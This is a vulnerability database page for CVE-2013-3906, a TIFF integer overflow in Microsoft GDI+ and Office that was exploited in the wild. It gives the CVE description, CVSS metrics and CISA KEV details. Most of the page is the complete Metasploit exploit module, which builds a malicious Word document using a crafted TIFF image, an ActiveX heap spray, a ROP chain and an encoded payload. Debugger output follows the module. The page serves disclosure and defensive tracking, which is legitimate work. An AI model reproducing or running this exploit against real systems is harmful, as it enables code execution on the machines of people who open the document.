CVE-2013-3906 : Detail

CVE-2013-3906

7.8
/
High
Code Injection
A03-Injection
96.97%V3
Local
2013-11-06
11h00 +00:00
2025-02-04
19h18 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

GDI+ in Microsoft Windows Vista SP2 and Server 2008 SP2; Office 2003 SP3, 2007 SP3, and 2010 SP1 and SP2; Office Compatibility Pack SP3; and Lync 2010, 2010 Attendee, 2013, and Basic 2013 allows remote attackers to execute arbitrary code via a crafted TIFF image, as demonstrated by an image in a Word document, and exploited in the wild in October and November 2013.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-94 Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Metrics

Metrics Score Severity CVSS Vector Source
V3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Local

The vulnerable component is not bound to the network stack and the attacker’s path is via read/write/execute capabilities.

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

Required

Successful exploitation of this vulnerability requires a user to take some action before the vulnerability can be exploited. For example, a successful exploit may only be possible during the installation of an application by a system administrator.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.

Unchanged

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.

 [email protected]
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

CISA KEV (Known Exploited Vulnerabilities)

Vulnerability name : Microsoft Graphics Component Memory Corruption Vulnerability

Required action : Apply updates per vendor instructions.

Known To Be Used in Ransomware Campaigns : Unknown

Added : 2022-02-14 23h00 +00:00

Action is due : 2022-08-14 22h00 +00:00

Important information
This CVE is identified as vulnerable and poses an active threat, according to the Catalog of Known Exploited Vulnerabilities (CISA KEV). The CISA has listed this vulnerability as actively exploited by cybercriminals, emphasizing the importance of taking immediate action to address this flaw. It is imperative to prioritize the update and remediation of this CVE to protect systems against potential cyberattacks.

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 30011

Publication date : 2013-12-02 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex/zip' require 'nokogiri' module ::Nokogiri module XML class Builder # # Some XML documents don't declare the namespace before referencing, but Nokogiri requires one. # So here's our hack to get around that by adding a new custom method to the Builder class # def custom_root(ns) e = @parent.create_element(ns) e.add_namespace_definition(ns, "href") @ns = e.namespace_definitions.find { |x| x.prefix == ns.to_s } return self end end end end class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::RopDb def initialize(info={}) super(update_info(info, 'Name' => "Microsoft Tagged Image File Format (TIFF) Integer Overflow", 'Description' => %q{ This module exploits a vulnerability found in Microsoft's Tagged Image File Format. It was originally discovered in the wild, targeting Windows XP and Windows Server 2003 users running Microsoft Office, specifically in the Middle East and South Asia region. The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a drawing in Microsoft Office, and how it gets calculated with user-controlled inputs, and stored in the EAX register. The 32-bit register will run out of storage space to represent the large vlaue, which ends up being 0, but it still gets pushed as a dwBytes argumenet (size) for a HeapAlloc call. The HeapAlloc function will allocate a chunk anyway with size 0, and the address of this chunk is used as the destination buffer of a memcpy function, where the source buffer is the EXIF data (an extended image format supported by TIFF), and is also user-controlled. A function pointer in the chunk returned by HeapAlloc will end up being overwritten by the memcpy function, and then later used in OGL!GdipCreatePath. By successfully controlling this function pointer, and the memory layout using ActiveX, it is possible to gain arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Some dude wrote it and deployed in the wild, but Haifei Li spotted it 'sinn3r' # Metasploit ], 'References' => [ [ 'CVE', '2013-3906' ], [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2896666' ], [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/11/05/cve-2013-3906-a-graphics-vulnerability-exploited-through-word-documents.aspx' ] ], 'Payload' => { 'PrependEncoder' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18] "\x83\xC0\x08" + # add eax, byte 8 "\x8b\x20" + # mov esp, [eax] "\x81\xC4\x30\xF8\xFF\xFF", # add esp, -2000 'BadChars' => "\x00" }, 'DefaultOptions' => { 'ExitFunction' => "process", 'PrependMigrate' => true }, 'Platform' => 'win', 'Targets' => [ # XP SP3 + Office 2010 Standard (14.0.6023.1000 32-bit) ['Windows XP SP3 with Office Starndard 2010', {}], ], 'Privileged' => false, 'DisclosureDate' => "Nov 5 2013", # Microsoft announcement 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The docx file', 'msf.docx']), ], self.class) end # # Creates a TIFF that triggers the overflow # def make_tiff # TIFF Header: # TIFF ID = 'II' (Intel order) # TIFF Version = 42d # Offset of FID = 0x000049c8h # # Image Directory: # Number of entries = 17d # Entry[0] NewSubFileType = 0 # Entry[1] ImageWidth = 256d # Entry[2] ImageHeight = 338d # Entry[3] BitsPerSample = 8 8 8 # Entry[4] Compression = JPEG (6) # Entry[5] Photometric Interpretation = RGP # Entry[6] StripOffsets = 68 entries (349 bytes) # Entry[7] SamplesPerPixel = 3 # Entry[8] RowsPerStrip = 5 # Entry[9] StripByteCounts = 68 entries (278 bytes) # Entry[10] XResolution = 96d # Entry[11] YResolution = 96d # Entry[12] Planar Configuration = Clunky # Entry[13] Resolution Unit = Inch # Entry[14] Predictor = None # Entry[15] JPEGInterchangeFormatLength = 5252h (1484h) # Entry[16] JPEGInterchangeFormat = 13636d # Notes: # These values are extracted from the file to calculate the HeapAlloc size that result in the overflow: # - JPEGInterchangeFormatLength # - DWORD at offset 3324h (0xffffb898), no documentation for this # - DWORDS after offset 3328h, no documentation for these, either. # The DWORD at offset 4874h is what ends up overwriting the function pointer by the memcpy # The trigger is really a TIF file, but is named as a JPEG in the docx package buf = '' path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2013-3906", "word", "media", "image1.jpeg") ::File.open(path, "rb") do |f| buf = f.read end # Gain control of the call [eax+50h] instruction # XCHG EAX, ESP; RETN msvcrt buf[0x4874, 4] = [0x200F0700-0x50].pack('V') buf end # # Generates a payload # def get_rop_payload p = '' p << [0x77c15ed5].pack('V') # XCHG EAX, ESP msvcrt p << generate_rop_payload('msvcrt','',{'target'=>'xp'}) p << payload.encoded block = p block << rand_text_alpha(1024 - 80 - p.length) block << [ 0x77c34fbf, 0x200f0704 ].pack("V") # pop esp # ret # from msvcrt block << rand_text_alpha(1024 - block.length) buf = '' while (buf.length < 0x80000) buf << block end buf end # # Creates an ActiveX bin that will be used as a spray in Office # def make_activex_bin # # How an ActiveX bin is referred: # document.xml.rels -> ActiveX[num].xml -> activeX[num].xml.rels -> ActiveX[num].bin # Every bin is a Microsoft Compound Document File: # http://www.openoffice.org/sc/compdocfileformat.pdf # The bin file mscd = '' mscd << [0xe011cfd0].pack('V') # File identifier (first 4 byte) mscd << [0xe11ab1a1].pack('V') # File identifier (second 4 byte) mscd << [0x00000000].pack('V') * 4 # Unique Identifier mscd << [0x003e].pack('v') # Revision number mscd << [0x0003].pack('v') # Version number mscd << [0xfffe].pack('v') # Byte order: Little-Endian mscd << [0x0009].pack('v') # Sector size mscd << [0x0006].pack('v') # Size of a short-sector mscd << "\x00" * 10 # Not used mscd << [0x00000001].pack('V') # Total number of sectors mscd << [0x00000001].pack('V') # SecID for the first sector mscd << [0x00000000].pack('V') # Not used mscd << [0x00001000].pack('V') # Minimum size of a standard stream mscd << [0x00000002].pack('V') # Sec ID of first sector mscd << [0x00000001].pack('V') # Total number of sectors for the short-sector table mscd << [0xfffffffe].pack('V') # SecID of first sector of the mastser sector table mscd << [0x00000000].pack('V') # Total number of sectors for master sector talbe mscd << [0x00000000].pack('V') # SecIDs mscd << [0xffffffff].pack('V') * 4 * 59 # SecIDs mscd[0x200, 4] = [0xfffffffd].pack('V') mscd[0x204, 12] = [0xfffffffe].pack('V') * 3 mscd << Rex::Text.to_unicode("Root Entry") mscd << [0x00000000].pack('V') * 11 mscd << [0x0016].pack('v') # Valid range of the previous char array mscd << "\x05" # Type of entry (Root Storage Entry) mscd << "\x00" # Node colour of the entry (red) mscd << [0xffffffff].pack('V') # DirID of the left child node mscd << [0xffffffff].pack('V') # DirID of the right child node mscd << [0x00000001].pack('V') # DirID of the root node entry mscd << [0x1efb6596].pack('V') mscd << [0x11d1857c].pack('V') mscd << [0xc0006ab1].pack('V') mscd << [0x283628f0].pack('V') mscd << [0x00000000].pack('V') * 3 mscd << [0x287e3070].pack('V') mscd << [0x01ce2654].pack('V') mscd << [0x00000003].pack('V') mscd << [0x00000100].pack('V') mscd << [0x00000000].pack('V') mscd << Rex::Text.to_unicode("Contents") mscd << [0x00000000].pack('V') * 12 mscd << [0x01020012].pack('V') mscd << [0xffffffff].pack('V') * 3 mscd << [0x00000000].pack('V') * 10 mscd << [0x000000e4].pack('V') mscd << [0x00000000].pack('V') * 18 mscd << [0xffffffff].pack('V') * 3 mscd << [0x00000000].pack('V') * 29 mscd << [0xffffffff].pack('V') * 3 mscd << [0x00000000].pack('V') * 12 mscd << [0x00000001].pack('V') mscd << [0x00000002].pack('V') mscd << [0x00000003].pack('V') mscd << [0xfffffffe].pack('V') mscd << [0xffffffff].pack('V') * 32 #52 mscd << [0x77c34fbf].pack('V') # POP ESP # RETN mscd << [0x200f0704].pack('V') # Final payload target address to begin the ROP mscd << [0xffffffff].pack('V') * 18 mscd << @rop_payload mscd end # # Creates an activeX[num].xml file # @param rid [String] The relationship ID (example: rId1) # @return [String] XML document # def make_activex_xml(rid) attrs = { 'ax:classid' => "{1EFB6596-857C-11D1-B16A-00C0F0283628}", 'ax:license' => "9368265E-85FE-11d1-8BE3-0000F8754DA1", 'ax:persistence' => "persistStorage", 'r:id' => "rId#{rid.to_s}", 'xmlns:ax' => "http://schemas.microsoft.com/office/2006/activeX", 'xmlns:r' => @schema } md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>") builder = ::Nokogiri::XML::Builder.with(md) do |xml| xml.custom_root("ax") xml.ocx(attrs) end builder.to_xml(:indent => 0) end # # Creates an activeX[num].xml.rels # @param relationships [Array] A collection of hashes with each containing: # :id, :type, :target # @return [String] XML document # def make_activex_xml_reals(rid, target_bin) acx_type = "http://schemas.microsoft.com/office/2006/relationships/activeXControlBinary" md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>") builder = ::Nokogiri::XML::Builder.with(md) do |xml| xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do xml.Relationship({:Id=>"rId#{rid.to_s}", :Type=>acx_type, :Target=>target_bin}) end end builder.to_xml(:indent => 0) end # # Creates a document.xml.reals file # @param relationships [Array] A collection of hashes with each containing: # :id, :type, and :target # @return [String] XML document # def make_doc_xml_reals(relationships) md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>") builder = ::Nokogiri::XML::Builder.with(md) do |xml| xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do relationships.each do |r| xml.Relationship({:Id=>"rId#{r[:id].to_s}", :Type=>r[:type], :Target=>r[:target]}) end end end builder.to_xml(:indent => 0) end # # Creates a _rels/.rels file # def init_rels(doc_xml, doc_props) rels = [] rels << doc_xml rels << doc_props rels = rels.flatten md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>") builder = ::Nokogiri::XML::Builder.with(md) do |xml| xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do rels.each do |r| xml.Relationship({:Id=>"rId#{r[:id].to_s}", :Type=>r[:type], :Target=>r[:fname].gsub(/^\//, '')}) end end end { :fname => "_rels/.rels", :data => builder.to_xml(:indent => 0) } end # # Creates a run element for chart # @param xml [Element] # @param rid [String] # def create_chart_run_element(xml, rid) drawingml_schema = "http://schemas.openxmlformats.org/drawingml/2006" xml.r do xml.rPr do xml.noProof xml.lang({'w:val' => "en-US"}) end xml.drawing do xml['wp'].inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do xml['wp'].extent({'cx'=>'1', 'cy'=>'1'}) xml['wp'].effectExtent({'l'=>"1", 't'=>"0", 'r'=>"1", 'b'=>"0"}) xml['wp'].docPr({'id'=>rid.to_s, 'name' => "drawing #{rid.to_s}"}) xml['wp'].cNvGraphicFramePr xml['a'].graphic do xml['a'].graphicData({'uri'=>"#{drawingml_schema}/chart"}) do xml['c'].chart({'r:id'=>"rId#{rid.to_s}"}) end end end end end end # # Creates a run element for ax # @param xml [Element] # @param rid [String] # def create_ax_run_element(xml, rid) shape_attrs = { 'id' => "_x0000_i10#{rid.to_s}", 'type' => "#_x0000_t75", 'style' => "width:1pt;height:1pt", 'o:ole' => "" } control_attrs = { 'r:id' => "rId#{rid.to_s}", 'w:name' => "TabStrip#{rid.to_s}", 'w:shapeid' =>"_x0000_i10#{rid.to_s}" } xml.r do xml.object({'w:dxaOrig'=>"1440", 'w:dyaOrig'=>"1440"}) do xml['v'].shape(shape_attrs) xml['w'].control(control_attrs) end end end # # Creates a pic run element # @param xml [Element] # @param rid [String] # def create_pic_run_element(xml, rid) drawinxml_schema = "http://schemas.openxmlformats.org/drawingml/2006" xml.r do xml.rPr do xml.noProof xml.lang({'w:val'=>"en-US"}) end xml.drawing do xml['wp'].inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do xml.extent({'cx'=>'1', 'cy'=>'1'}) xml['wp'].effectExtent({'l'=>"1", 't'=>"0", 'r'=>"0", 'b'=>"0"}) xml['wp'].docPr({'id'=>rid.to_s, 'name'=>"image", 'descr'=>"image.jpeg"}) xml['wp'].cNvGraphicFramePr do xml['a'].graphicFrameLocks({'xmlns:a'=>"#{drawinxml_schema}/main", 'noChangeAspect'=>"1"}) end xml['a'].graphic({'xmlns:a'=>"#{drawinxml_schema}/main"}) do xml['a'].graphicData({'uri'=>"#{drawinxml_schema}/picture"}) do xml['pic'].pic({'xmlns:pic'=>"#{drawinxml_schema}/picture"}) do xml['pic'].nvPicPr do xml['pic'].cNvPr({'id'=>rid.to_s, 'name'=>"image.jpeg"}) xml['pic'].cNvPicPr end xml['pic'].blipFill do xml['a'].blip('r:embed'=>"rId#{rid.to_s}", 'cstate'=>"print") xml['a'].stretch do xml['a'].fillRect end end xml['pic'].spPr do xml['a'].xfrm do xml['a'].off({'x'=>"0", 'y'=>"0"}) xml['a'].ext({'cx'=>"1", 'cy'=>"1"}) end xml['a'].prstGeom({'prst' => "rect"}) do xml['a'].avLst end end end end end end end end end # # Creates a document.xml file # @param pre_defs [Array] # @param activex [Array] # @param tiff_file [Array] # @return [String] XML document # def init_doc_xml(last_rid, pre_defs, activex, tiff_file) # Get all the required pre-defs chart_rids = [] pre_defs.select { |e| chart_rids << e[:id] if e[:fname] =~ /\/word\/charts\//} # Get all the ActiveX RIDs ax_rids = [] activex.select { |e| ax_rids << e[:id] } # Get the TIFF RID tiff_rid = tiff_file[:id] # Documentation on how this is crafted: # http://msdn.microsoft.com/en-us/library/office/gg278308.aspx doc_attrs = { 'xmlns:ve' => "http://schemas.openxmlformats.org/markup-compatibility/2006", 'xmlns:o' => "urn:schemas-microsoft-com:office:office", 'xmlns:r' => @schema, 'xmlns:m' => "http://schemas.openxmlformats.org/officeDocument/2006/math", 'xmlns:v' => "urn:schemas-microsoft-com:vml", 'xmlns:wp' => "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing", 'xmlns:w10' => "urn:schemas-microsoft-com:office:word", 'xmlns:w' => "http://schemas.openxmlformats.org/wordprocessingml/2006/main", 'xmlns:wne' => "http://schemas.microsoft.com/office/word/2006/wordml", 'xmlns:a' => "http://schemas.openxmlformats.org/drawingml/2006/main", 'xmlns:c' => "http://schemas.openxmlformats.org/drawingml/2006/chart" } p_attrs_1 = {'w:rsidR' => "00F8254F", 'w:rsidRDefault' => "00D15BD0" } p_attrs_2 = {'w:rsidR' => "00D15BD0", 'w:rsidRPr' =>"00D15BD0", 'w:rsidRDefault' => "00D15BD0" } md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>") builder = ::Nokogiri::XML::Builder.with(md) do |xml| xml.custom_root("w") xml.document(doc_attrs) do xml.body do # Paragraph (ActiveX) xml.p(p_attrs_1) do # Paragraph properties xml.pPr do # Run properties xml.rPr do xml.lang({'w:val' => "en-US"}) end end ax_rids.each do |rid| create_ax_run_element(xml, rid) end end xml.p(p_attrs_2) do xml.pPr do xml.rPr do xml['w'].lang({'w:val'=>"en-US"}) end end # Charts chart_rids.each do |rid| create_chart_run_element(xml, rid) end # TIFF create_pic_run_element(xml, tiff_rid) end end end end { :id => (last_rid + 1).to_s, :type => "#{@schema}/officeDocument", :fname => "/word/document.xml", :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml", :xml => builder.to_xml(:indent => 0) } end # # Creates a [Content.Types].xml file located in the parent directory # @param overrides [Array] A collection of hashes with each containing # the :PartName and :ContentType info # @return [String] XML document # def make_contenttype_xml(overrides) contenttypes = [ { :Extension => "rels", :ContentType => "application/vnd.openxmlformats-package.relationships+xml" }, { :Extension => "xml", :ContentType => "application/xml" }, { :Extension => "jpeg", :ContentType => "image/jpeg" }, { :Extension => "bin", :ContentType => "application/vnd.ms-office.activeX" }, { :Extension => "xlsx", :ContentType => "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet" } ] md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>") builder = ::Nokogiri::XML::Builder.with(md) do |xml| xml.Types({'xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types"}) do # Default extensions contenttypes.each do |contenttype| xml.Default(contenttype) end # Additional overrides overrides.each do |override| override_attrs = { :PartName => override[:PartName] || override[:fname], :ContentType => override[:ContentType] } xml.Override(override_attrs) end end end builder.to_xml(:indent => 0) end # # Pre-define some items that will be used in .rels # def init_doc_props(last_rid) items = [] items << { :id => (last_rid += 1), :type => "#{@schema}/extended-properties", :fname => "/docProps/app.xml", :content_type => "application/vnd.openxmlformats-officedocument.extended-properties+xml" } items << { :id => (last_rid += 1), :type => "http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties", :fname => "/docProps/core.xml", :content_type => "application/vnd.openxmlformats-package.core-properties+xml" } return last_rid, items end # # Pre-define some items that will be used in document.xml.rels # def init_doc_xml_rels_items(last_rid) items = [] items << { :id => (last_rid += 1), :type => "#{@schema}/styles", :fname => "/word/styles.xml", :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml" } items << { :id => (last_rid += 1), :type => "#{@schema}/settings", :fname => "/word/settings.xml", :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml" } items << { :id => (last_rid += 1), :type => "#{@schema}/webSettings", :fname => "/word/webSettings.xml", :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml" } items << { :id => (last_rid += 1), :type => "#{@schema}/fontTable", :fname => "/word/fontTable.xml", :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml" } items << { :id => (last_rid += 1), :type => "#{@schema}/theme", :fname => "/word/theme/theme1.xml", :content_type => "application/vnd.openxmlformats-officedocument.theme+xml" } items << { :id => (last_rid += 1), :type => "#{@schema}/chart", :fname => "/word/charts/chart1.xml", :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml" } items << { :id => (last_rid += 1), :type => "#{@schema}/chart", :fname => "/word/charts/chart2.xml", :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml" } items << { :id => (last_rid += 1), :type => "#{@schema}/chart", :fname => "/word/charts/chart3.xml", :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml" } items << { :id => (last_rid += 1), :type => "#{@schema}/chart", :fname => "/word/charts/chart4.xml", :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml" } items << { :id => (last_rid += 1), :type => "#{@schema}/chart", :fname => "/word/charts/chart5.xml", :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml" } items << { :id => (last_rid += 1), :type => "#{@schema}/chart", :fname => "/word/charts/chart6.xml", :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml" } return last_rid, items end # # Manually create everything manually in the ActiveX directory # def init_activex_files(last_rid) activex = [] 0x250.times do |i| id = (last_rid += 1) bin = { :fname => "/word/activeX/activeX#{id.to_s}.bin", :bin => make_activex_bin } xml = { :fname => "/word/activeX/activeX#{id.to_s}.xml", :xml => make_activex_xml(id) } rels = { :fname => "/word/activeX/_rels/activeX#{id.to_s}.xml.rels", :rels => make_activex_xml_reals(id, "activeX#{id.to_s}.bin") } ct = "application/vnd.ms-office.activeX+xml" type = "#{@schema}/control" activex << { :id => id, :bin => bin, :xml => xml, :rels => rels, :content_type => ct, :type => type } end return last_rid, activex end # # Create a [Content_Types.xml], each node contains these attributes: # :PartName The path to an ActiveX XML file # :ContentType The contenttype of the XML file # def init_contenttype_xml_file(*items) overrides = [] items.each do |item| item.each do |obj| overrides << {:PartName => obj[:fname] || obj[:xml][:fname], :ContentType => obj[:content_type]} end end {:fname => "[Content_Types].xml", :data => make_contenttype_xml(overrides)} end # # Creates the tiff file # def init_tiff_file(last_rid) id = last_rid + 1 tiff_data = { :id => id, :fname => "/word/media/image1.jpeg", :data => make_tiff, :type => "#{@schema}/image" } return id, tiff_data end # # Create the document.xml.rels file # def init_doc_xml_reals_file(pre_defs, activex, tiff) reals = [] pre_defs.each do |obj| reals << {:id => obj[:id], :type => obj[:type], :target => obj[:fname].gsub(/^\/word\//, '')} end activex.each do |obj| reals << {:id => obj[:id], :type => obj[:type], :target => obj[:xml][:fname].gsub(/^\/word\//, '')} end reals << {:id => tiff[:id], :type => tiff[:type], :target => tiff[:fname].gsub(/^\/word\//, '')} {:fname => "/word/_rels/document.xml.rels", :data => make_doc_xml_reals(reals)} end # # Loads a fiile # def read_file(fname) buf = '' ::File.open(fname, "rb") do |f| buf << f.read end buf end # # Packages everything to docx # def make_docx(path) print_status("Initializing files...") last_rid = 0 last_rid, doc_xml_rels_items = init_doc_xml_rels_items(last_rid) last_rid, activex = init_activex_files(last_rid) last_rid, doc_props = init_doc_props(last_rid) last_rid, tiff_file = init_tiff_file(last_rid) doc_xml = init_doc_xml(last_rid, doc_xml_rels_items, activex, tiff_file) ct_xml_file = init_contenttype_xml_file(activex, doc_xml_rels_items, doc_props, [doc_xml]) doc_xml_reals_file = init_doc_xml_reals_file(doc_xml_rels_items, activex, tiff_file) rels_xml = init_rels(doc_xml, doc_props) zip = Rex::Zip::Archive.new Dir["#{path}/**/**"].each do |file| p = file.sub(path+'/','') if File.directory?(file) print_status("Packing directory: #{p}") zip.add_file(p) else # Avoid packing image1.jpeg because we'll load it separately if file !~ /media\/image1\.jpeg/ print_status("Packing file: #{p}") zip.add_file(p, read_file(file)) end end end print_status("Packing ActiveX controls...") activex.each do |ax| ax_bin = ax[:bin] ax_xml = ax[:xml] ax_rels = ax[:rels] vprint_status("Packing file: #{ax_bin[:fname]}") zip.add_file(ax_bin[:fname], ax_bin[:bin]) vprint_status("Packing file: #{ax_xml[:fname]}") zip.add_file(ax_xml[:fname], ax_xml[:xml]) vprint_status("Packing file: #{ax_rels[:fname]}") zip.add_file(ax_rels[:fname], ax_rels[:rels]) end print_status("Packing file: #{ct_xml_file[:fname]}") zip.add_file(ct_xml_file[:fname], ct_xml_file[:data]) print_status("Packing file: #{tiff_file[:fname]}") zip.add_file(tiff_file[:fname], tiff_file[:data]) print_status("Packing file: #{doc_xml[:fname]}") zip.add_file(doc_xml[:fname], doc_xml[:xml]) print_status("Packing file: #{rels_xml[:fname]}") zip.add_file(rels_xml[:fname], rels_xml[:data]) print_status("Packing file: #{doc_xml_reals_file[:fname]}") zip.add_file(doc_xml_reals_file[:fname], doc_xml_reals_file[:data]) zip.pack end def exploit @rop_payload = get_rop_payload @schema = "http://schemas.openxmlformats.org/officeDocument/2006/relationships" path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-3906") docx = make_docx(path) file_create(docx) end end =begin 0:000> r eax=414242f4 ebx=00000000 ecx=22a962a0 edx=44191398 esi=22c4d338 edi=1cfe5dc0 eip=44023a2a esp=0011fd8c ebp=0011fd98 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286 OGL!GdipCreatePath+0x58: 44023a2a ff5050 call dword ptr [eax+50h] ds:0023:41424344=???????? 0:000> k ChildEBP RetAddr WARNING: Stack unwind information not available. Following frames may be wrong. 0011fd98 437a9681 OGL!GdipCreatePath+0x58 0011fdc8 437b11b0 gfx+0x9681 0011fdf0 422b56e5 gfx+0x111b0 0011fe18 422a99f7 oart!Ordinal3584+0x86 0011fed8 422a9921 oart!Ordinal7649+0x2b2 0011fef0 422a8676 oart!Ordinal7649+0x1dc 001200bc 422a85a8 oart!Ordinal4145+0x199 001200fc 424898c6 oart!Ordinal4145+0xcb 001201bc 42489b56 oart!Ordinal3146+0xb15 001202cc 422a37df oart!Ordinal3146+0xda5 00120330 422a2a73 oart!Ordinal2862+0x14e 00120360 317821a9 oart!Ordinal2458+0x5e 001203bc 31782110 wwlib!GetAllocCounters+0x9bd51 001204a4 3177d1f2 wwlib!GetAllocCounters+0x9bcb8 001207ec 3177caef wwlib!GetAllocCounters+0x96d9a 0012088c 3177c7a0 wwlib!GetAllocCounters+0x96697 001209b0 3175ab83 wwlib!GetAllocCounters+0x96348 001209d4 317569e0 wwlib!GetAllocCounters+0x7472b 00120ad4 317540f5 wwlib!GetAllocCounters+0x70588 00120afc 3175400b wwlib!GetAllocCounters+0x6dc9d To-do: Turn the docx packaging into a mixin. Good luck with that. =end

Products Mentioned

Configuraton 0

Microsoft>>Excel_viewer >> Version -

Microsoft>>Lync >> Version 2010

Microsoft>>Lync >> Version 2013

Microsoft>>Office >> Version 2003

Microsoft>>Office >> Version 2007

Microsoft>>Office >> Version 2010

Microsoft>>Office >> Version 2010

Microsoft>>Office_compatibility_pack >> Version -

Microsoft>>Powerpoint_viewer >> Version 2010

    Microsoft>>Powerpoint_viewer >> Version 2010

